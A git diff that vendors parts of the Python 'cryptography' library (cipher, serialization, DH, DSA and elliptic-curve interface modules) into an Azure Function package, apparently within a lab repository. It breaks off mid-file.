/dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/_cipheralgorithm.py @@ -0,0 +1,40 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import abc +import typing + + +# This exists to break an import cycle. It is normally accessible from the +# ciphers module. + + +class CipherAlgorithm(metaclass=abc.ABCMeta): + @abc.abstractproperty + def name(self) -> str: + """ + A string naming this mode (e.g. "AES", "Camellia"). + """ + + @abc.abstractproperty + def key_sizes(self) -> typing.FrozenSet[int]: + """ + Valid key sizes for this algorithm in bits + """ + + @abc.abstractproperty + def key_size(self) -> int: + """ + The size of the key being used as an integer in bits (e.g. 128, 256). + """ + + +class BlockCipherAlgorithm(metaclass=abc.ABCMeta): + key: bytes + + @abc.abstractproperty + def block_size(self) -> int: + """ + The size of a block as an integer in bits (e.g. 64, 128). + """ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/_serialization.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/_serialization.py new file mode 100644 index 0000000..2bc63db --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/_serialization.py @@ -0,0 +1,55 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import abc + +from cryptography import utils + +# This exists to break an import cycle. These classes are normally accessible +# from the serialization module. + + +class Encoding(utils.Enum): + PEM = "PEM" + DER = "DER" + OpenSSH = "OpenSSH" + Raw = "Raw" + X962 = "ANSI X9.62" + SMIME = "S/MIME" + + +class PrivateFormat(utils.Enum): + PKCS8 = "PKCS8" + TraditionalOpenSSL = "TraditionalOpenSSL" + Raw = "Raw" + OpenSSH = "OpenSSH" + + +class PublicFormat(utils.Enum): + SubjectPublicKeyInfo = "X.509 subjectPublicKeyInfo with PKCS#1" + PKCS1 = "Raw PKCS#1" + OpenSSH = "OpenSSH" + Raw = "Raw" + CompressedPoint = "X9.62 Compressed Point" + UncompressedPoint = "X9.62 Uncompressed Point" + + +class ParameterFormat(utils.Enum): + PKCS3 = "PKCS3" + + +class KeySerializationEncryption(metaclass=abc.ABCMeta): + pass + + +class BestAvailableEncryption(KeySerializationEncryption): + def __init__(self, password: bytes): + if not isinstance(password, bytes) or len(password) == 0: + raise ValueError("Password must be 1 or more bytes.") + + self.password = password + + +class NoEncryption(KeySerializationEncryption): + pass diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__init__.py new file mode 100644 index 0000000..171557e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__init__.py @@ -0,0 +1,3 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..10683e0 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/dh.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/dh.cpython-39.pyc new file mode 100644 index 0000000..662a3d7 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/dh.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/dsa.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/dsa.cpython-39.pyc new file mode 100644 index 0000000..005eeb5 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/dsa.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/ec.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/ec.cpython-39.pyc new file mode 100644 index 0000000..d200375 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/ec.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/ed25519.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/ed25519.cpython-39.pyc new file mode 100644 index 0000000..4667d86 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/ed25519.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/ed448.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/ed448.cpython-39.pyc new file mode 100644 index 0000000..affe396 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/ed448.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/padding.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/padding.cpython-39.pyc new file mode 100644 index 0000000..6ba746f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/padding.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/rsa.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/rsa.cpython-39.pyc new file mode 100644 index 0000000..65a36e9 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/rsa.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/types.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/types.cpython-39.pyc new file mode 100644 index 0000000..20dcea5 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/types.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/utils.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/utils.cpython-39.pyc new file mode 100644 index 0000000..971913b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/utils.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/x25519.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/x25519.cpython-39.pyc new file mode 100644 index 0000000..9cfe410 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/x25519.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/x448.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/x448.cpython-39.pyc new file mode 100644 index 0000000..5bdc998 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/x448.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/dh.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/dh.py new file mode 100644 index 0000000..121854a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/dh.py @@ -0,0 +1,250 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import abc +import typing + +from cryptography.hazmat.primitives import _serialization + + +_MIN_MODULUS_SIZE = 512 + + +def generate_parameters( + generator: int, key_size: int, backend: typing.Any = None +) -> "DHParameters": + from cryptography.hazmat.backends.openssl.backend import backend as ossl + + return ossl.generate_dh_parameters(generator, key_size) + + +class DHParameterNumbers: + def __init__(self, p: int, g: int, q: typing.Optional[int] = None) -> None: + if not isinstance(p, int) or not isinstance(g, int): + raise TypeError("p and g must be integers") + if q is not None and not isinstance(q, int): + raise TypeError("q must be integer or None") + + if g < 2: + raise ValueError("DH generator must be 2 or greater") + + if p.bit_length() < _MIN_MODULUS_SIZE: + raise ValueError( + "p (modulus) must be at least {}-bit".format(_MIN_MODULUS_SIZE) + ) + + self._p = p + self._g = g + self._q = q + + def __eq__(self, other: object) -> bool: + if not isinstance(other, DHParameterNumbers): + return NotImplemented + + return ( + self._p == other._p and self._g == other._g and self._q == other._q + ) + + def parameters(self, backend: typing.Any = None) -> "DHParameters": + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + return ossl.load_dh_parameter_numbers(self) + + @property + def p(self) -> int: + return self._p + + @property + def g(self) -> int: + return self._g + + @property + def q(self) -> typing.Optional[int]: + return self._q + + +class DHPublicNumbers: + def __init__(self, y: int, parameter_numbers: DHParameterNumbers) -> None: + if not isinstance(y, int): + raise TypeError("y must be an integer.") + + if not isinstance(parameter_numbers, DHParameterNumbers): + raise TypeError( + "parameters must be an instance of DHParameterNumbers." + ) + + self._y = y + self._parameter_numbers = parameter_numbers + + def __eq__(self, other: object) -> bool: + if not isinstance(other, DHPublicNumbers): + return NotImplemented + + return ( + self._y == other._y + and self._parameter_numbers == other._parameter_numbers + ) + + def public_key(self, backend: typing.Any = None) -> "DHPublicKey": + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + return ossl.load_dh_public_numbers(self) + + @property + def y(self) -> int: + return self._y + + @property + def parameter_numbers(self) -> DHParameterNumbers: + return self._parameter_numbers + + +class DHPrivateNumbers: + def __init__(self, x: int, public_numbers: DHPublicNumbers) -> None: + if not isinstance(x, int): + raise TypeError("x must be an integer.") + + if not isinstance(public_numbers, DHPublicNumbers): + raise TypeError( + "public_numbers must be an instance of " "DHPublicNumbers." + ) + + self._x = x + self._public_numbers = public_numbers + + def __eq__(self, other: object) -> bool: + if not isinstance(other, DHPrivateNumbers): + return NotImplemented + + return ( + self._x == other._x + and self._public_numbers == other._public_numbers + ) + + def private_key(self, backend: typing.Any = None) -> "DHPrivateKey": + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + return ossl.load_dh_private_numbers(self) + + @property + def public_numbers(self) -> DHPublicNumbers: + return self._public_numbers + + @property + def x(self) -> int: + return self._x + + +class DHParameters(metaclass=abc.ABCMeta): + @abc.abstractmethod + def generate_private_key(self) -> "DHPrivateKey": + """ + Generates and returns a DHPrivateKey. + """ + + @abc.abstractmethod + def parameter_bytes( + self, + encoding: _serialization.Encoding, + format: _serialization.ParameterFormat, + ) -> bytes: + """ + Returns the parameters serialized as bytes. + """ + + @abc.abstractmethod + def parameter_numbers(self) -> DHParameterNumbers: + """ + Returns a DHParameterNumbers. + """ + + +DHParametersWithSerialization = DHParameters + + +class DHPublicKey(metaclass=abc.ABCMeta): + @abc.abstractproperty + def key_size(self) -> int: + """ + The bit length of the prime modulus. + """ + + @abc.abstractmethod + def parameters(self) -> DHParameters: + """ + The DHParameters object associated with this public key. + """ + + @abc.abstractmethod + def public_numbers(self) -> DHPublicNumbers: + """ + Returns a DHPublicNumbers. + """ + + @abc.abstractmethod + def public_bytes( + self, + encoding: _serialization.Encoding, + format: _serialization.PublicFormat, + ) -> bytes: + """ + Returns the key serialized as bytes. + """ + + +DHPublicKeyWithSerialization = DHPublicKey + + +class DHPrivateKey(metaclass=abc.ABCMeta): + @abc.abstractproperty + def key_size(self) -> int: + """ + The bit length of the prime modulus. + """ + + @abc.abstractmethod + def public_key(self) -> DHPublicKey: + """ + The DHPublicKey associated with this private key. + """ + + @abc.abstractmethod + def parameters(self) -> DHParameters: + """ + The DHParameters object associated with this private key. + """ + + @abc.abstractmethod + def exchange(self, peer_public_key: DHPublicKey) -> bytes: + """ + Given peer's DHPublicKey, carry out the key exchange and + return shared key as bytes. + """ + + @abc.abstractmethod + def private_numbers(self) -> DHPrivateNumbers: + """ + Returns a DHPrivateNumbers. + """ + + @abc.abstractmethod + def private_bytes( + self, + encoding: _serialization.Encoding, + format: _serialization.PrivateFormat, + encryption_algorithm: _serialization.KeySerializationEncryption, + ) -> bytes: + """ + Returns the key serialized as bytes. + """ + + +DHPrivateKeyWithSerialization = DHPrivateKey diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/dsa.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/dsa.py new file mode 100644 index 0000000..6a682d2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/dsa.py @@ -0,0 +1,288 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import abc +import typing + +from cryptography.hazmat.primitives import _serialization, hashes +from cryptography.hazmat.primitives.asymmetric import ( + utils as asym_utils, +) + + +class DSAParameters(metaclass=abc.ABCMeta): + @abc.abstractmethod + def generate_private_key(self) -> "DSAPrivateKey": + """ + Generates and returns a DSAPrivateKey. + """ + + @abc.abstractmethod + def parameter_numbers(self) -> "DSAParameterNumbers": + """ + Returns a DSAParameterNumbers. + """ + + +DSAParametersWithNumbers = DSAParameters + + +class DSAPrivateKey(metaclass=abc.ABCMeta): + @abc.abstractproperty + def key_size(self) -> int: + """ + The bit length of the prime modulus. + """ + + @abc.abstractmethod + def public_key(self) -> "DSAPublicKey": + """ + The DSAPublicKey associated with this private key. + """ + + @abc.abstractmethod + def parameters(self) -> DSAParameters: + """ + The DSAParameters object associated with this private key. + """ + + @abc.abstractmethod + def sign( + self, + data: bytes, + algorithm: typing.Union[asym_utils.Prehashed, hashes.HashAlgorithm], + ) -> bytes: + """ + Signs the data + """ + + @abc.abstractmethod + def private_numbers(self) -> "DSAPrivateNumbers": + """ + Returns a DSAPrivateNumbers. + """ + + @abc.abstractmethod + def private_bytes( + self, + encoding: _serialization.Encoding, + format: _serialization.PrivateFormat, + encryption_algorithm: _serialization.KeySerializationEncryption, + ) -> bytes: + """ + Returns the key serialized as bytes. + """ + + +DSAPrivateKeyWithSerialization = DSAPrivateKey + + +class DSAPublicKey(metaclass=abc.ABCMeta): + @abc.abstractproperty + def key_size(self) -> int: + """ + The bit length of the prime modulus. + """ + + @abc.abstractmethod + def parameters(self) -> DSAParameters: + """ + The DSAParameters object associated with this public key. + """ + + @abc.abstractmethod + def public_numbers(self) -> "DSAPublicNumbers": + """ + Returns a DSAPublicNumbers. + """ + + @abc.abstractmethod + def public_bytes( + self, + encoding: _serialization.Encoding, + format: _serialization.PublicFormat, + ) -> bytes: + """ + Returns the key serialized as bytes. + """ + + @abc.abstractmethod + def verify( + self, + signature: bytes, + data: bytes, + algorithm: typing.Union[asym_utils.Prehashed, hashes.HashAlgorithm], + ) -> None: + """ + Verifies the signature of the data. + """ + + +DSAPublicKeyWithSerialization = DSAPublicKey + + +class DSAParameterNumbers: + def __init__(self, p: int, q: int, g: int): + if ( + not isinstance(p, int) + or not isinstance(q, int) + or not isinstance(g, int) + ): + raise TypeError( + "DSAParameterNumbers p, q, and g arguments must be integers." + ) + + self._p = p + self._q = q + self._g = g + + @property + def p(self) -> int: + return self._p + + @property + def q(self) -> int: + return self._q + + @property + def g(self) -> int: + return self._g + + def parameters(self, backend: typing.Any = None) -> DSAParameters: + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + return ossl.load_dsa_parameter_numbers(self) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, DSAParameterNumbers): + return NotImplemented + + return self.p == other.p and self.q == other.q and self.g == other.g + + def __repr__(self) -> str: + return ( + "".format(self=self) + ) + + +class DSAPublicNumbers: + def __init__(self, y: int, parameter_numbers: DSAParameterNumbers): + if not isinstance(y, int): + raise TypeError("DSAPublicNumbers y argument must be an integer.") + + if not isinstance(parameter_numbers, DSAParameterNumbers): + raise TypeError( + "parameter_numbers must be a DSAParameterNumbers instance." + ) + + self._y = y + self._parameter_numbers = parameter_numbers + + @property + def y(self) -> int: + return self._y + + @property + def parameter_numbers(self) -> DSAParameterNumbers: + return self._parameter_numbers + + def public_key(self, backend: typing.Any = None) -> DSAPublicKey: + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + return ossl.load_dsa_public_numbers(self) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, DSAPublicNumbers): + return NotImplemented + + return ( + self.y == other.y + and self.parameter_numbers == other.parameter_numbers + ) + + def __repr__(self) -> str: + return ( + "".format(self=self) + ) + + +class DSAPrivateNumbers: + def __init__(self, x: int, public_numbers: DSAPublicNumbers): + if not isinstance(x, int): + raise TypeError("DSAPrivateNumbers x argument must be an integer.") + + if not isinstance(public_numbers, DSAPublicNumbers): + raise TypeError( + "public_numbers must be a DSAPublicNumbers instance." + ) + self._public_numbers = public_numbers + self._x = x + + @property + def x(self) -> int: + return self._x + + @property + def public_numbers(self) -> DSAPublicNumbers: + return self._public_numbers + + def private_key(self, backend: typing.Any = None) -> DSAPrivateKey: + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + return ossl.load_dsa_private_numbers(self) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, DSAPrivateNumbers): + return NotImplemented + + return ( + self.x == other.x and self.public_numbers == other.public_numbers + ) + + +def generate_parameters( + key_size: int, backend: typing.Any = None +) -> DSAParameters: + from cryptography.hazmat.backends.openssl.backend import backend as ossl + + return ossl.generate_dsa_parameters(key_size) + + +def generate_private_key( + key_size: int, backend: typing.Any = None +) -> DSAPrivateKey: + from cryptography.hazmat.backends.openssl.backend import backend as ossl + + return ossl.generate_dsa_private_key_and_parameters(key_size) + + +def _check_dsa_parameters(parameters: DSAParameterNumbers) -> None: + if parameters.p.bit_length() not in [1024, 2048, 3072, 4096]: + raise ValueError( + "p must be exactly 1024, 2048, 3072, or 4096 bits long" + ) + if parameters.q.bit_length() not in [160, 224, 256]: + raise ValueError("q must be exactly 160, 224, or 256 bits long") + + if not (1 < parameters.g < parameters.p): + raise ValueError("g, p don't satisfy 1 < g < p.") + + +def _check_dsa_private_numbers(numbers: DSAPrivateNumbers) -> None: + parameters = numbers.public_numbers.parameter_numbers + _check_dsa_parameters(parameters) + if numbers.x <= 0 or numbers.x >= parameters.q: + raise ValueError("x must be > 0 and < q.") + + if numbers.public_numbers.y != pow(parameters.g, numbers.x, parameters.p): + raise ValueError("y must be equal to (g ** x % p).") diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/ec.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/ec.py new file mode 100644 index 0000000..7179883 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/ec.py @@ -0,0 +1,523 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import abc +import typing +import warnings + +from cryptography import utils +from cryptography.hazmat._oid import ObjectIdentifier +from cryptography.hazmat.primitives import _serialization, hashes +from cryptography.hazmat.primitives.asymmetric import ( + utils as asym_utils, +) + + +class EllipticCurveOID: + SECP192R1 = ObjectIdentifier("1.2.840.10045.3.1.1") + SECP224R1 = ObjectIdentifier("1.3.132.0.33") + SECP256K1 = ObjectIdentifier("1.3.132.0.10") + SECP256R1 = ObjectIdentifier("1.2.840.10045.3.1.7") + SECP384R1 = ObjectIdentifier("1.3.132.0.34") + SECP521R1 = ObjectIdentifier("1.3.132.0.35") + BRAINPOOLP256R1 = ObjectIdentifier("1.3.36.3.3.2.8.1.1.7") + BRAINPOOLP384R1 = ObjectIdentifier("1.3.36.3.3.2.8.1.1.11") + BRAINPOOLP512R1 = ObjectIdentifier("1.3.36.3.3.2.8.1.1.13") + SECT163K1 = ObjectIdentifier("1.3.132.0.1") + SECT163R2 = ObjectIdentifier("1.3.132.0.15") + SECT233K1 = ObjectIdentifier("1.3.132.0.26") + SECT233R1 = ObjectIdentifier("1.3.132.0.27") + SECT283K1 = ObjectIdentifier("1.3.132.0.16") + SECT283R1 = ObjectIdentifier("1.3.132.0.17") + SECT409K1 = ObjectIdentifier("1.3.132.0.36") + SECT409R1 = ObjectIdentifier("1.3.132.0.37") + SECT571K1 = ObjectIdentifier("1.3.132.0.38") + SECT571R1 = ObjectIdentifier("1.3.132.0.39") + + +class EllipticCurve(metaclass=abc.ABCMeta): + @abc.abstractproperty + def name(self) -> str: + """ + The name of the curve. e.g. secp256r1. + """ + + @abc.abstractproperty + def key_size(self) -> int: + """ + Bit size of a secret scalar for the curve. + """ + + +class EllipticCurveSignatureAlgorithm(metaclass=abc.ABCMeta): + @abc.abstractproperty + def algorithm( + self, + ) -> typing.Union[asym_utils.Prehashed, hashes.HashAlgorithm]: + """ + The digest algorithm used with this signature. + """ + + +class EllipticCurvePrivateKey(metaclass=abc.ABCMeta): + @abc.abstractmethod + def exchange( + self, algorithm: "ECDH", peer_public_key: "EllipticCurvePublicKey" + ) -> bytes: + """ + Performs a key exchange operation using the provided algorithm with the + provided peer's public key. + """ + + @abc.abstractmethod + def public_key(self) -> "EllipticCurvePublicKey": + """ + The EllipticCurvePublicKey for this private key. + """ + + @abc.abstractproperty + def curve(self) -> EllipticCurve: + """ + The EllipticCurve that this key is on. + """ + + @abc.abstractproperty + def key_size(self) -> int: + """ + Bit size of a secret scalar for the curve. + """ + + @abc.abstractmethod + def sign( + self, + data: bytes, + signature_algorithm: EllipticCurveSignatureAlgorithm, + ) -> bytes: + """ + Signs the data + """ + + @abc.abstractmethod + def private_numbers(self) -> "EllipticCurvePrivateNumbers": + """ + Returns an EllipticCurvePrivateNumbers. + """ + + @abc.abstractmethod + def private_bytes( + self, + encoding: _serialization.Encoding, + format: _serialization.PrivateFormat, + encryption_algorithm: _serialization.KeySerializationEncryption, + ) -> bytes: + """ + Returns the key serialized as bytes. + """ + + +EllipticCurvePrivateKeyWithSerialization = EllipticCurvePrivateKey + + +class EllipticCurvePublicKey(metaclass=abc.ABCMeta): + @abc.abstractproperty + def curve(self) -> EllipticCurve: + """ + The EllipticCurve that this key is on. + """ + + @abc.abstractproperty + def key_size(self) -> int: + """ + Bit size of a secret scalar for the curve. + """ + + @abc.abstractmethod + def public_numbers(self) -> "EllipticCurvePublicNumbers": + """ + Returns an EllipticCurvePublicNumbers. + """ + + @abc.abstractmethod + def public_bytes( + self, + encoding: _serialization.Encoding, + format: _serialization.PublicFormat, + ) -> bytes: + """ + Returns the key serialized as bytes. + """ + + @abc.abstractmethod + def verify( + self, + signature: bytes, + data: bytes, + signature_algorithm: EllipticCurveSignatureAlgorithm, + ) -> None: + """ + Verifies the signature of the data. + """ + + @classmethod + def from_encoded_point( + cls, curve: EllipticCurve, data: bytes + ) -> "EllipticCurvePublicKey": + utils._check_bytes("data", data) + + if not isinstance(curve, EllipticCurve): + raise TypeError("curve must be an EllipticCurve instance") + + if len(data) == 0: + raise ValueError("data must not be an empty byte string") + + if data[0] not in [0x02, 0x03, 0x04]: + raise ValueError("Unsupported elliptic curve point type") + + from cryptography.hazmat.backends.openssl.backend import backend + + return backend.load_elliptic_curve_public_bytes(curve, data) + + +EllipticCurvePublicKeyWithSerialization = EllipticCurvePublicKey + + +class SECT571R1(EllipticCurve): + name = "sect571r1" + key_size = 570 + + +class SECT409R1(EllipticCurve): + name = "sect409r1" + key_size = 409 + + +class SECT283R1(EllipticCurve): + name = "sect283r1" + key_size = 283 + + +class SECT233R1(EllipticCurve): + name = "sect233r1" + key_size = 233 + + +class SECT163R2(EllipticCurve): + name = "sect163r2" + key_size = 163 + + +class SECT571K1(EllipticCurve): + name = "sect571k1" + key_size = 571 + + +class SECT409K1(EllipticCurve): + name = "sect409k1" + key_size = 409 + + +class SECT283K1(EllipticCurve): + name = "sect283k1" + key_size = 283 + + +class SECT233K1(EllipticCurve): + name = "sect233k1" + key_size = 233 + + +class SECT163K1(EllipticCurve): + name = "sect163k1" + key_size = 163 + + +class SECP521R1(EllipticCurve): + name = "secp521r1" + key_size = 521 + + +class SECP384R1(EllipticCurve): + name = "secp384r1" + key_size = 384 + + +class SECP256R1(EllipticCurve): + name = "secp256r1" + key_size = 256 + + +class SECP256K1(EllipticCurve): + name = "secp256k1" + key_size = 256 + + +class SECP224R1(EllipticCurve): + name = "secp224r1" + key_size = 224 + + +class SECP192R1(EllipticCurve): + name = "secp192r1" + key_size = 192 + + +class BrainpoolP256R1(EllipticCurve): + name = "brainpoolP256r1" + key_size = 256 + + +class BrainpoolP384R1(EllipticCurve): + name = "brainpoolP384r1" + key_size = 384 + + +class BrainpoolP512R1(EllipticCurve): + name = "brainpoolP512r1" + key_size = 512 + + +_CURVE_TYPES: typing.Dict[str, typing.Type[EllipticCurve]] = { + "prime192v1": SECP192R1, + "prime256v1": SECP256R1, + "secp192r1": SECP192R1, + "secp224r1": SECP224R1, + "secp256r1": SECP256R1, + "secp384r1": SECP384R1, + "secp521r1": SECP521R1, + "secp256k1": SECP256K1, + "sect163k1": SECT163K1, + "sect233k1": SECT233K1, + "sect283k1": SECT283K1, + "sect409k1": SECT409K1, + "sect571k1": SECT571K1, + "sect163r2": SECT163R2, + "sect233r1": SECT233R1, + "sect283r1": SECT283R1, + "sect409r1": SECT409R1, + "sect571r1": SECT571R1, + "brainpoolP256r1": BrainpoolP256R1, + "brainpoolP384r1": BrainpoolP384R1, + "brainpoolP512r1": BrainpoolP512R1, +} + + +class ECDSA(EllipticCurveSignatureAlgorithm): + def __init__( + self, + algorithm: typing.Union[asym_utils.Prehashed, hashes.HashAlgorithm], + ): + self._algorithm = algorithm + + @property + def algorithm( + self, + ) -> typing.Union[asym_utils.Prehashed, hashes.HashAlgorithm]: + return self._algorithm + + +def generate_private_key( + curve: EllipticCurve, backend: typing.Any = None +) -> EllipticCurvePrivateKey: + from cryptography.hazmat.backends.openssl.backend import backend as ossl + + return ossl.generate_elliptic_curve_private_key(curve) + + +def derive_private_key( + private_value: int, + curve: EllipticCurve, + backend: typing.Any = None, +) -> EllipticCurvePrivateKey: + from cryptography.hazmat.backends.openssl.backend import backend as ossl + + if not isinstance(private_value, int): + raise TypeError("private_value must be an integer type.") + + if private_value <= 0: + raise ValueError("private_value must be a positive integer.") + + if not isinstance(curve, EllipticCurve): + raise TypeError("curve must provide the EllipticCurve interface.") + + return ossl.derive_elliptic_curve_private_key(private_value, curve) + + +class EllipticCurvePublicNumbers: + def __init__(self, x: int, y: int, curve: EllipticCurve): + if not isinstance(x, int) or not isinstance(y, int): + raise TypeError("x and y must be integers.") + + if not isinstance(curve, EllipticCurve): + raise TypeError("curve must provide the EllipticCurve interface.") + + self._y = y + self._x = x + self._curve = curve + + def public_key(self, backend: typing.Any = None) -> EllipticCurvePublicKey: + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + return ossl.load_elliptic_curve_public_numbers(self) + + def encode_point(self) -> bytes: + warnings.warn( + "encode_point has been deprecated on EllipticCurvePublicNumbers" + " and will be removed in a future version. Please use " + "EllipticCurvePublicKey.public_bytes to obtain both " + "compressed and uncompressed point encoding.", + utils.PersistentlyDeprecated2019, + stacklevel=2, + ) + # key_size is in bits. Convert to bytes and round up + byte_length = (self.curve.key_size + 7) // 8 + return ( + b"\x04" + + utils.int_to_bytes(self.x, byte_length) + + utils.int_to_bytes(self.y, byte_length) + ) + + @classmethod + def from_encoded_point( + cls, curve: EllipticCurve, data: bytes + ) -> "EllipticCurvePublicNumbers": + if not isinstance(curve, EllipticCurve): + raise TypeError("curve must be an EllipticCurve instance") + + warnings.warn( + "Support for 